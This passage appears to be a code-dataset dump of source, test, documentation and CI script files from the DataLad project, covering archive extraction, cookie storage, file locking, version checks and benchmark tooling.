self.send(\"REMOVE-FAILURE\", akey,\n # \"Removal from file archives is not supported\")\n\n def whereis(self, key):\n return False\n # although more logical is to report back success, it leads to imho\n # more confusing duplication. See\n # http://git-annex.branchable.com/design/external_special_remote_protocol/#comment-3f9588f6a972ae566347b6f467b53b54\n # try:\n # key, file = self._get_akey_afile(key)\n # self.send(\"WHEREIS-SUCCESS\", \"file %s within archive %s\" % (file, key))\n # except ValueError:\n # self.send(\"WHEREIS-FAILURE\")\n\n def transfer_retrieve(self, key, file):\n akeys_tried = []\n # the same file could come from multiple files within the same archive\n # So far it doesn't make sense to \"try all\" of them since if one fails\n # it means the others would fail too, so it makes sense to immediately\n # prune the list so we keep only the ones from unique akeys.\n # May be whenever we support extraction directly from the tarballs\n # we should go through all and choose the one easiest to get or smth.\n for akey, afile in self._gen_akey_afiles(\n key, sorted=True, unique_akeys=True):\n if not akey:\n lgr.warning(\"Got an empty archive key %r for key %s. Skipping\",\n akey, key)\n continue\n akeys_tried.append(akey)\n try:\n with lock_if_check_fails(\n check=(self.get_contentlocation, (akey,)),\n lock_path=(\n lambda k: op.join(self.repo.path,\n '.git',\n 'datalad-archives-%s' % k),\n (akey,)),\n operation=\"annex-get\"\n ) as (akey_fpath, lock):\n if lock:\n assert not akey_fpath\n self._annex_get_archive_by_key(akey)\n akey_fpath = self.get_contentlocation(akey)\n\n if not akey_fpath:\n raise RuntimeError(\n \"We were reported to fetch it alright but now can't \"\n \"get its location. 
Check logic\"\n )\n\n akey_path = op.join(self.repo.path, akey_fpath)\n assert op.exists(akey_path), \\\n \"Key file %s is not present\" % akey_path\n\n # Extract that bloody file from the bloody archive\n # TODO: implement/use caching, for now a simple one\n # actually patool doesn't support extraction of a single file\n # https://github.com/wummel/patool/issues/20\n # so\n pwd = getpwd()\n lgr.debug(\n \"Getting file %s from %s while PWD=%s\",\n afile, akey_path, pwd)\n was_extracted = self.cache[akey_path].is_extracted\n apath = self.cache[akey_path].get_extracted_file(afile)\n link_file_load(apath, file)\n if not was_extracted and self.cache[akey_path].is_extracted:\n self.message(\n \"%s special remote is using an extraction cache \"\n \"under %s. Remove it with DataLad's 'clean' \"\n \"command to save disk space.\" %\n (ARCHIVES_SPECIAL_REMOTE,\n self.cache[akey_path].path),\n type='info',\n )\n return\n except Exception as exc:\n ce = CapturedException(exc)\n self.message(\n \"Failed to fetch {akey} containing {key}: {msg}\".format(\n akey=akey,\n key=key,\n # we need to get rid of any newlines, or we might\n # break the special remote protocol\n msg=str(ce).replace('\\n', '|')\n ))\n continue\n\n raise RemoteError(\n \"Failed to fetch any archive containing {key}. \"\n \"Tried: {akeys_tried}\".format(**locals())\n )\n\n def claimurl(self, url):\n scheme = urlparse(url).scheme\n if scheme in self.SUPPORTED_SCHEMES:\n return True\n else:\n return False\n\n def _annex_get_archive_by_key(self, akey):\n # TODO: make it more stringent?\n # Command could have fail to run if key was not present locally yet\n # Thus retrieve the key using annex\n # TODO: we need to report user somehow about this happening and\n # progress on the download\n from humanize import naturalsize\n\n from datalad.support.annexrepo import AnnexJsonProtocol\n\n akey_size = self.repo.get_size_from_key(akey)\n self.message(\n \"To obtain some keys we need to fetch an archive \"\n \"of size %s\"\n % (naturalsize(akey_size) if akey_size else \"unknown\"),\n type='info',\n )\n\n try:\n self.repo._call_annex(\n [\"get\", \"--json\", \"--json-progress\", \"--key\", akey],\n protocol=AnnexJsonProtocol,\n )\n except Exception:\n self.message(f'Failed to fetch archive with key {akey}')\n raise\n\n\ndef main():\n \"\"\"cmdline entry point\"\"\"\n super_main(\n cls=ArchiveAnnexCustomRemote,\n remote_name='datalad-archives',\n description=\\\n \"extract content from archives (.tar{,.gz}, .zip, etc) which are \"\n \"in turn managed by git-annex. 
See `datalad add-archive-content` \"\n \"command\",\n )\n" }, { "alpha_fraction": 0.601012647151947, "alphanum_fraction": 0.6303797364234924, "avg_line_length": 41.934783935546875, "blob_id": "9d4d64b35c20e1018dc3fd1860a07e75437ed6c0", "content_id": "189606b0d189b11c548f2f1ef651c3f96ea416c5", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1975, "license_type": "permissive", "max_line_length": 171, "num_lines": 46, "path": "/datalad/support/tests/test_cookies.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nfrom datalad.support import path as op\nfrom datalad.tests.utils_pytest import (\n assert_equal,\n known_failure_githubci_win,\n with_tempfile,\n)\nfrom datalad.utils import rmtree\n\nfrom ..cookies import CookiesDB\n\n\n@known_failure_githubci_win\n@with_tempfile(mkdir=True)\ndef test_no_blows(cookiesdir=None):\n cookies = CookiesDB(op.join(cookiesdir, 'mycookies'))\n # set the cookie\n cookies['best'] = 'mine'\n assert_equal(cookies['best'], 'mine')\n \"\"\"\n Somehow this manages to trigger on conda but not on debian for me\n File \"/home/yoh/anaconda-2018.12-3.7/envs/test-gitpython/lib/python3.7/shelve.py\", line 125, in __setitem__\n self.dict[key.encode(self.keyencoding)] = f.getvalue()\n File \"/home/yoh/anaconda-2018.12-3.7/envs/test-gitpython/lib/python3.7/dbm/dumb.py\", line 216, in __setitem__\n self._index[key] = self._setval(pos, val)\n File \"/home/yoh/anaconda-2018.12-3.7/envs/test-gitpython/lib/python3.7/dbm/dumb.py\", line 178, in _setval\n with _io.open(self._datfile, 'rb+') as f:\n FileNotFoundError: [Errno 2] No such file or directory: '/home/yoh/.tmp/datalad_temp_test_no_blowsalnsw_wk/mycookies.dat'\n\n on Debian (python 3.7.3~rc1-1) I just get a warning: BDB3028 /home/yoh/.tmp/datalad_temp_test_no_blows58tdg67s/mycookies.db: unable to flush: No such file or directory\n \"\"\"\n try:\n rmtree(cookiesdir)\n except OSError:\n # on NFS directory might still be open, so .nfs* lock file would prevent\n # removal, but it shouldn't matter and .close should succeed\n pass\n cookies.close()\n" }, { "alpha_fraction": 0.7606557607650757, "alphanum_fraction": 0.7606557607650757, "avg_line_length": 32.88888931274414, "blob_id": "f1fd2c8b1fbbf56f87f93fbc408c97fb18f9efc1", "content_id": "fe21ec4ef2c6bd244a1073e630e2b3991f155d56", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 305, "license_type": "permissive", "max_line_length": 74, "num_lines": 9, "path": "/datalad/plugin/export_to_figshare.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "import warnings\n\nwarnings.warn(\n \"datalad.plugin.export_to_figshare is deprecated and will be removed \"\n \"in a future release. 
Use the module from its new location \"\n \"datalad.distributed.export_to_figshare instead.\",\n DeprecationWarning)\n\nfrom datalad.distributed.export_to_figshare import *\n" }, { "alpha_fraction": 0.6517150402069092, "alphanum_fraction": 0.662269115447998, "avg_line_length": 21.294116973876953, "blob_id": "eed10ab4c4e1ae38755a045d6c06077e1a9cbf30", "content_id": "a2f8eb5e160583cc7b3914c1055f52fee333e0f2", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 379, "license_type": "permissive", "max_line_length": 98, "num_lines": 17, "path": "/tools/ci/install-minimum-git.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\nset -eu\n\nMIN_VERSION=\"$(perl -ne 'print $1 if /^ *GIT_MIN_VERSION = \"(\\S+)\"$/' datalad/support/gitrepo.py)\"\nif test -z \"$MIN_VERSION\"\nthen\n echo \"Failed to extract minimum git version\" >&2\n exit 1\nfi\n\ntarget_dir=\"$PWD/git-src\"\ngit clone https://github.com/git/git \"$target_dir\"\ncd \"$target_dir\"\ngit checkout \"refs/tags/v$MIN_VERSION\"\nmake --jobs 2\n./git version\n" }, { "alpha_fraction": 0.5025746822357178, "alphanum_fraction": 0.5077239871025085, "avg_line_length": 36.346153259277344, "blob_id": "15f9939fbd919b0d83c62dd652c77796c41e6ffa", "content_id": "3198eb0f6cfdc0d9c5bcf6615f96baabc0f2109b", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 971, "license_type": "permissive", "max_line_length": 87, "num_lines": 26, "path": "/datalad/cli/tests/test_helpers.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Tests for cmdline.helpers\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nfrom datalad.tests.utils_pytest import assert_equal\n\nfrom ..helpers import _fix_datalad_ri\n\n\ndef test_fix_datalad_ri():\n assert_equal(_fix_datalad_ri('/'), '/')\n assert_equal(_fix_datalad_ri('/a/b'), '/a/b')\n assert_equal(_fix_datalad_ri('//'), '///')\n assert_equal(_fix_datalad_ri('///'), '///')\n assert_equal(_fix_datalad_ri('//a'), '///a')\n assert_equal(_fix_datalad_ri('///a'), '///a')\n assert_equal(_fix_datalad_ri('//a/b'), '///a/b')\n assert_equal(_fix_datalad_ri('///a/b'), '///a/b')\n" }, { "alpha_fraction": 0.5072765350341797, "alphanum_fraction": 0.5218295454978943, "avg_line_length": 27.294116973876953, "blob_id": "fae15a278a9f54aeb66aab649d7524468ebded93", "content_id": "e89eb512d315f407af844183b0f604a28c651bbd", "detected_licenses": [ "BSD-3-Clause", "MIT", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 481, "license_type": "permissive", "max_line_length": 100, "num_lines": 17, "path": "/tools/testing/travis_ifdown_nonlo.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# Helper to bring interfaces down/up for testing\nset -eu\nif [ $1 = \"down\" ]; then\n NONLO=$(ifconfig | awk '/^[a-z]/{print $1;}' | grep -v '^lo$' | tr '\\n' ' ' | sed -e 's, *$,,g')\n for i in $NONLO; do\n echo \"I: bringing down $i\" >&2\n sudo ifdown $i >&2\n done\n 
echo \"export DATALAD_TESTS_NONLO='$NONLO'\"\nelif [ $1 = \"up\" ]; then\n for i in ${DATALAD_TESTS_NONLO}; do\n echo \"I: bringing up $i\" >&2\n sudo ifup $i >&2\n done\n\nfi\n" }, { "alpha_fraction": 0.7504196763038635, "alphanum_fraction": 0.7526580691337585, "avg_line_length": 42.06024169921875, "blob_id": "e5d0a1a941b3d9542e69761b43fcfeb6e896ab74", "content_id": "54cbf25f6839e1447073f1e603cb985aac1df090", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3574, "license_type": "permissive", "max_line_length": 79, "num_lines": 83, "path": "/docs/source/design/miscpatterns.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_designpatterns:\n\n**********************\nMiscellaneous patterns\n**********************\n\nDataLad is the result of a distributed and collaborative development effort\nover many years. During this time the scope of the project has changed\nmultiple times. As a consequence, the API and employed technologies have been\nadjusted repeatedly. Depending on the age of a piece of code, a clear software\ndesign is not always immediately visible. This section documents a few design\npatterns that the project strives to adopt at present. Changes to existing code\nand new contributions should follow these guidelines.\n\n\nGenerator methods in `Repo` classes\n===================================\n\nSubstantial parts of DataLad are implemented to behave like Python generators\nin order to be maximally responsive when processing long-running tasks. This\nincluded methods of the core API classes\n:class:`~datalad.support.gitrepo.GitRepo` and\n:class:`~datalad.support.annexrepo.AnnexRepo`. By convention, such methods\ncarry a trailing `_` in their name. In some cases, sibling methods with the\nsame name, but without the trailing underscore are provided. These behave like\ntheir generator-equivalent, but eventually return an iterable once processing\nis fully completed.\n\n\nCalls to Git commands\n=====================\n\nDataLad is built on Git, so calls to Git commands are a key element of the code\nbase. All such calls should be made through methods of the\n:class:`~datalad.support.gitrepo.GitRepo` class. This is necessary, as only\nthere it is made sure that Git operates under the desired conditions\n(environment configuration, etc.).\n\nFor some functionality, for example querying and manipulating `gitattributes`,\ndedicated methods are provided. However, in many cases simple one-off calls to\nget specific information from Git, or trigger certain operations are needed.\nFor these purposes the :class:`~datalad.support.gitrepo.GitRepo` class provides\na set of convenience methods aiming to cover use cases requiring particular\nreturn values:\n\n- test success of a command:\n :meth:`~datalad.support.gitrepo.GitRepo.call_git_success`\n- obtain `stdout` of a command:\n :meth:`~datalad.support.gitrepo.GitRepo.call_git`\n- obtain a single output line:\n :meth:`~datalad.support.gitrepo.GitRepo.call_git_oneline`\n- obtain items from output split by a separator:\n :meth:`~datalad.support.gitrepo.GitRepo.call_git_items_`\n\nAll these methods take care of raising appropriate exceptions when expected\nconditions are not met. 
Whenever desired functionality can be achieved\nusing simple custom calls to Git via these methods, their use is preferred\nover the implementation of additional, dedicated wrapper methods.\n\nCommand examples\n================\n\nExamples of Python and commandline invocations of DataLad's user-oriented\ncommands are defined in the class of the respective command as dictionaries\nwithin `_examples_`:\n\n.. code-block:: python\n\n _examples_ = [\n dict(text=\"\"\"Create a dataset 'mydataset' in the current directory\"\"\",\n code_py=\"create(path='mydataset')\",\n code_cmd=\"datalad create mydataset\",\n dict(text=\"\"\"Apply the text2git procedure upon creation of a dataset\"\"\",\n code_py=\"create(path='mydataset', cfg_proc='text2git')\",\n code_cmd=\"datalad create -c text2git mydataset\")\n ]\n\nThe formatting of code lines is preserved. Changes to existing examples and\nnew contributions should provide examples for Python and commandline API, as\nwell as a concise description.\n" }, { "alpha_fraction": 0.6428571343421936, "alphanum_fraction": 0.6477832794189453, "avg_line_length": 18.33333396911621, "blob_id": "f01b3a3a54de1d6d78712f924d45acbdd0882b24", "content_id": "439debe98e26ed0cdfa3516bf122ce4b0a96caf3", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 812, "license_type": "permissive", "max_line_length": 76, "num_lines": 42, "path": "/tools/ci/benchmark-travis-pr.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -eu\n\nif [ \"$TRAVIS_PULL_REQUEST\" = \"false\" ]\nthen\n echo \"I: skipping benchmarks for non-PR branch\"\n exit 0\nfi\n\nconfigure_asv () {\n cat << EOF > asv.conf.json\n{\n \"version\": 1,\n \"repo\": \".\",\n \"branches\": [\"HEAD\"],\n \"environment_type\": \"virtualenv\",\n}\nEOF\n}\n\nrun_asv () {\n pip install -e .\n git show --no-patch --format=\"%H (%s)\"\n configure_asv\n asv run -E existing --set-commit-hash $(git rev-parse HEAD)\n}\n\npip install asv\nasv machine --yes\n\ngit update-ref refs/bm/pr HEAD\n# We know this is a PR run. 
The branch is a GitHub refs/pull/*/merge ref, so\n# the current target that this PR will be merged into is HEAD^1.\ngit update-ref refs/bm/merge-target HEAD^1\n\nrun_asv\n\ngit checkout --force refs/bm/merge-target\nrun_asv\n\nasv compare refs/bm/merge-target refs/bm/pr\n" }, { "alpha_fraction": 0.5668638944625854, "alphanum_fraction": 0.5682840347290039, "avg_line_length": 33.63114929199219, "blob_id": "51f4df150036da4a699e2513b24bf7a48c4db888", "content_id": "f5e42a50bf837ab65c885aef02f7b176356d7191", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4225, "license_type": "permissive", "max_line_length": 126, "num_lines": 122, "path": "/datalad/support/cookies.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Management of cookies for HTTP sessions\"\"\"\n\nfrom __future__ import annotations\n\nimport atexit\nimport logging\nimport os.path\nimport shelve\nfrom pathlib import Path\nfrom typing import (\n Any,\n Optional,\n)\n\nimport platformdirs\n\nfrom datalad.support.exceptions import CapturedException\n\nfrom .network import get_tld\n\nlgr = logging.getLogger('datalad.cookies')\n\n\n# FIXME should make into a decorator so that it closes the cookie_db upon exiting whatever func uses it\nclass CookiesDB:\n \"\"\"Some little helper to deal with cookies\n\n Lazy loading from the shelved dictionary\n\n TODO: this is not multiprocess or multi-thread safe implementation due to shelve auto saving etc\n \"\"\"\n def __init__(self, filename: Optional[str | Path] = None) -> None:\n self._filename = filename\n self._cookies_db: Optional[shelve.Shelf[Any]] = None\n atexit.register(self.close)\n\n @property\n def cookies_db(self) -> Optional[shelve.Shelf[Any]]:\n if self._cookies_db is None:\n self._load()\n return self._cookies_db\n\n def _load(self):\n if self._cookies_db is not None:\n return\n if self._filename:\n filename = self._filename\n cookies_dir = os.path.dirname(filename)\n else:\n cookies_dir = os.path.join(platformdirs.user_config_dir(), 'datalad') # FIXME prolly shouldn't hardcode 'datalad'\n filename = os.path.join(cookies_dir, 'cookies')\n\n # TODO: guarantee restricted permissions\n\n if not os.path.exists(cookies_dir):\n os.makedirs(cookies_dir)\n\n lgr.debug(\"Opening cookies DB %s\", filename)\n try:\n self._cookies_db = shelve.open(filename, writeback=True, protocol=2)\n except Exception as exc:\n lgr.warning(\"Failed to open cookies DB %s: %s\",\n filename, CapturedException(exc))\n\n def close(self) -> None:\n if self._cookies_db is not None:\n try:\n # It might print out traceback right on the terminal instead of\n # just throwing an exception\n known_cookies = list(self._cookies_db)\n except Exception:\n # May be already not accessible\n known_cookies = None\n try:\n self._cookies_db.close()\n except Exception as exc:\n ce = CapturedException(exc)\n if known_cookies:\n lgr.warning(\n \"Failed to save possibly updated %d cookies (%s): %s\",\n len(known_cookies), ', '.join(known_cookies), ce)\n # no cookies - no worries!\n self._cookies_db = None\n\n def _get_provider(self, url: str) -> 
str:\n tld = get_tld(url)\n return tld\n\n def __getitem__(self, url: str) -> Any:\n try:\n return self.cookies_db[self._get_provider(url)] # type: ignore[index]\n except Exception as exc:\n lgr.warning(\"Failed to get a cookie for %s: %s\",\n url, CapturedException(exc))\n return None\n\n def __setitem__(self, url: str, value: Any) -> None:\n try:\n self.cookies_db[self._get_provider(url)] = value # type: ignore[index]\n except Exception as exc:\n lgr.warning(\"Failed to set a cookie for %s: %s\",\n url, CapturedException(exc))\n\n def __contains__(self, url: str) -> Optional[bool]:\n try:\n return self._get_provider(url) in self.cookies_db # type: ignore[operator]\n except Exception as exc:\n lgr.warning(\"Failed to check for having a cookie for %s: %s\",\n url, CapturedException(exc))\n return None\n\n\n# TODO -- convert into singleton pattern for CookiesDB\ncookies_db = CookiesDB()\n" }, { "alpha_fraction": 0.610863208770752, "alphanum_fraction": 0.6139405965805054, "avg_line_length": 33.569149017333984, "blob_id": "7cf638276229633fa93e2b07b87cd83144ffa259", "content_id": "dec4911323deb905d11b4da18b0df5528c4fc594", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6499, "license_type": "permissive", "max_line_length": 108, "num_lines": 188, "path": "/datalad/support/locking.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "from fasteners import (\n InterProcessLock,\n try_lock,\n)\nfrom contextlib import contextmanager\n\nfrom .path import exists\nfrom ..utils import (\n ensure_unicode,\n get_open_files,\n unlink,\n)\nfrom datalad.support.exceptions import CapturedException\n\n\nimport logging\nlgr = logging.getLogger('datalad.locking')\n\n\ndef _get(entry):\n \"\"\"A helper to get the value, be it a callable or callable with args, or value\n\n \"\"\"\n if isinstance(entry, (tuple, list)):\n func, args = entry\n return func(*args)\n elif callable(entry):\n return entry()\n else:\n return entry\n\n\n@contextmanager\ndef lock_if_check_fails(\n check,\n lock_path,\n operation=None,\n blocking=True,\n _return_acquired=False,\n **kwargs\n):\n \"\"\"A context manager to establish a lock conditionally on result of a check\n\n It is intended to be used as a lock for a specific file and/or operation,\n e.g. for `annex get`ing a file or extracting an archive, so only one process\n would be performing such an operation.\n\n If verification of the check fails, it tries to acquire the lock, but if\n that fails on the first try, it will rerun check before proceeding to func\n\n checker and lock_path_prefix could be a value, or callable, or\n a tuple composing callable and its args\n\n Unfortunately yoh did not find any way in Python 2 to have a context manager\n which just skips the entire block if some condition is met (in Python3 there\n is ExitStack which could potentially be used). 
So we would need still to\n check in the block body if the context manager return value is not None.\n\n Note also that the used type of the lock (fasteners.InterprocessLock) works\n only across processes and would not lock within the same (threads) process.\n\n Parameters\n ----------\n check: callable or (callable, args) or value\n If value (possibly after calling a callable) evaluates to True, no\n lock is acquired, and no context is executed\n lock_path: callable or (callable, args) or value\n Provides a path for the lock file, composed from that path + '.lck'\n extension\n operation: str, optional\n If provided, would be part of the locking extension\n blocking: bool, optional\n If blocking, process would be blocked until acquired and verified that it\n was acquired after it gets the lock\n _return_acquired: bool, optional\n Return also if lock was acquired. For \"private\" use within DataLad (tests),\n do not rely on it in 3rd party solutions.\n **kwargs\n Passed to `.acquire` of the fasteners.InterProcessLock\n\n Returns\n -------\n result of check, lock[, acquired]\n \"\"\"\n check1 = _get(check)\n if check1: # we are done - nothing to do\n yield check1, None\n return\n # acquire blocking lock\n lock_filename = _get(lock_path)\n\n lock_filename += '.'\n if operation:\n lock_filename += operation + '-'\n lock_filename += 'lck'\n\n lock = InterProcessLock(lock_filename)\n acquired = False\n try:\n lgr.debug(\"Acquiring a lock %s\", lock_filename)\n acquired = lock.acquire(blocking=blocking, **kwargs)\n lgr.debug(\"Acquired? lock %s: %s\", lock_filename, acquired)\n if blocking:\n assert acquired\n check2 = _get(check)\n ret_lock = None if check2 else lock\n if _return_acquired:\n yield check2, ret_lock, acquired\n else:\n yield check2, ret_lock\n finally:\n if acquired:\n lgr.debug(\"Releasing lock %s\", lock_filename)\n lock.release()\n if exists(lock_filename):\n unlink(lock_filename)\n\n\n@contextmanager\ndef try_lock_informatively(lock, purpose=None, timeouts=(5, 60, 240), proceed_unlocked=False):\n \"\"\"Try to acquire lock (while blocking) multiple times while logging INFO messages on failure\n\n Primary use case is for operations which are user-visible and thus should not lock\n indefinetely or for long period of times (so user would just Ctrl-C if no update is provided)\n without \"feedback\".\n\n Parameters\n ----------\n lock: fasteners._InterProcessLock\n purpose: str, optional\n timeouts: tuple or list, optional\n proceed_unlocked: bool, optional\n \"\"\"\n purpose = \" to \" + str(purpose) if purpose else ''\n\n # could be bytes, making formatting trickier\n lock_path = ensure_unicode(lock.path)\n\n def get_pids_msg():\n try:\n pids = get_open_files(lock_path)\n if pids:\n proc = pids[lock_path]\n return f'Check following process: PID={proc.pid} CWD={proc.cwd()} CMDLINE={proc.cmdline()}.'\n else:\n return 'Stale lock? I found no processes using it.'\n except Exception as exc:\n lgr.debug(\n \"Failed to get a list of processes which 'posses' the file %s: %s\",\n lock_path,\n CapturedException(exc)\n )\n return 'Another process is using it (failed to determine one)?'\n\n lgr.debug(\"Acquiring a currently %s lock%s. 
If stalls - check which process holds %s\",\n (\"existing\" if lock.exists() else \"absent\"),\n purpose,\n lock_path)\n\n was_locked = False # name of var the same as of within fasteners.try_lock\n assert timeouts # we expect non-empty timeouts\n try:\n for trial, timeout in enumerate(timeouts):\n was_locked = lock.acquire(blocking=True, timeout=timeout)\n if not was_locked:\n if trial < len(timeouts) - 1:\n msg = \" Will try again and wait for up to %4g seconds.\" % (timeouts[trial+1],)\n else: # It was the last attempt\n if proceed_unlocked:\n msg = \" Will proceed without locking.\"\n else:\n msg = \"\"\n lgr.info(\"Failed to acquire lock%s at %s in %4g seconds. %s%s\",\n purpose, lock_path, timeout, get_pids_msg(), msg)\n else:\n yield True\n return\n else:\n assert not was_locked\n if proceed_unlocked:\n yield False\n else:\n raise RuntimeError(\n \"Failed to acquire lock%s at %s in %d attempts.%s\"\n % (purpose, lock_path, len(timeouts), get_pids_msg()))\n finally:\n if was_locked:\n lock.release()\n" }, { "alpha_fraction": 0.5260980129241943, "alphanum_fraction": 0.5289624333381653, "avg_line_length": 39.80519485473633, "blob_id": "3d036f59f2b3f6eca82588aaeadf2b38a48a62ea", "content_id": "14951b43f85c6c53ac37d6040a7f62a2e95674fe", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3142, "license_type": "permissive", "max_line_length": 88, "num_lines": 77, "path": "/datalad/tests/test_version.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport re\n\nfrom packaging.version import Version\n\nfrom datalad.support import path as op\nfrom datalad.tests.utils_pytest import (\n SkipTest,\n assert_equal,\n assert_greater,\n assert_in,\n assert_not_in,\n ok_startswith,\n)\nfrom datalad.utils import ensure_unicode\n\nfrom .. import __version__\n\n\ndef test__version__():\n # in released stage, version in the last CHANGELOG entry\n # should correspond to the one in datalad\n CHANGELOG_filename = op.join(\n op.dirname(__file__), op.pardir, op.pardir, 'CHANGELOG.md')\n if not op.exists(CHANGELOG_filename):\n raise SkipTest(\"no %s found\" % CHANGELOG_filename)\n regex = re.compile(r'^# '\n r'(?P<version>[0-9]+\\.[0-9.abcrc~]+)\\s+'\n r'\\((?P<date>.*)\\)'\n )\n with open(CHANGELOG_filename, 'rb') as f:\n for line in f:\n line = line.rstrip()\n if not line.startswith(b'# '):\n # The first section header we hit, must be our changelog entry\n continue\n reg = regex.match(ensure_unicode(line))\n if not reg: # first one at that level is the one\n raise AssertionError(\n \"Following line must have matched our regex: %r\" % line)\n regd = reg.groupdict()\n changelog_version = regd['version']\n lv_changelog_version = Version(changelog_version)\n # we might have a suffix - sanitize\n san__version__ = __version__.rstrip('.dirty')\n lv__version__ = Version(san__version__)\n if '???' 
in regd['date'] and 'will be better than ever' in regd['codename']:\n # we only have our template\n # we can only assert that its version should be higher than\n # the one we have now\n assert_greater(lv_changelog_version, lv__version__)\n else:\n # should be a \"release\" record\n assert_not_in('???', regd['date'])\n ok_startswith(__version__, changelog_version)\n if lv__version__ != lv_changelog_version:\n # It was not tagged yet and Changelog has no new records\n # (they are composed by auto upon release)\n assert_greater(lv__version__, lv_changelog_version)\n assert_in('+', san__version__) # we have build suffix\n else:\n # all is good, tagged etc\n assert_equal(lv_changelog_version, lv__version__)\n assert_equal(changelog_version, san__version__)\n return\n\n raise AssertionError(\n \"No log line matching our regex found in %s\" % CHANGELOG_filename\n )\n" }, { "alpha_fraction": 0.6006787419319153, "alphanum_fraction": 0.6097285151481628, "avg_line_length": 19.090909957885742, "blob_id": "25cbf48543a914b4c515f2a9b53d496cd817ba68", "content_id": "dd9af614ad3abe1498cd13c7530779e1a713a10c", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 884, "license_type": "permissive", "max_line_length": 76, "num_lines": 44, "path": "/tools/changelog-todo", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\nset -eu\n\nusage () {\n cat >&2 <<EOF\nusage: $0\n\nCreate a CHANGELOG to-do list for items between the last commit that touched\nthe CHANGELOG and the current commit.\nEOF\n}\n\ntest $# -eq 0 || { usage; exit 1; }\n\nclog=CHANGELOG.md\nheadrev=$(git rev-parse HEAD)\n\nlastrev=$(git rev-list --no-merges --first-parent -n1 HEAD -- \":(top)$clog\")\nif test -z \"$lastrev\"\nthen\n echo >&2 \"Could not determine last commit to touch $clog\"\n exit 1\nfi\n\nfmt=\"? %s%n %h^-1\"\nrange=\"$lastrev..$headrev\"\n\ncat <<EOF\nUpdate $(git describe \"HEAD:$clog\")\n\nGenerated with\n git log --format=\"$fmt\" --reverse --first-parent \\\\\n $range\n\n? 
= unprocessed and undecided\n- = decided not to include\n+ = included\n+* = included, but might still be bits that should be added\n-----------------------------------------------------------\n\nEOF\n\ngit log --format=\"$fmt\" --reverse --first-parent \"$range\"\n" }, { "alpha_fraction": 0.5594013333320618, "alphanum_fraction": 0.5687558650970459, "avg_line_length": 25.073171615600586, "blob_id": "cd3f59f249c867b46ae732b9d9a7379a04b2843f", "content_id": "9798aad6178d46825eecef623c245bd1e8a3644c", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1069, "license_type": "permissive", "max_line_length": 79, "num_lines": 41, "path": "/datalad/distributed/tests/test_create_sibling_gogs.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### 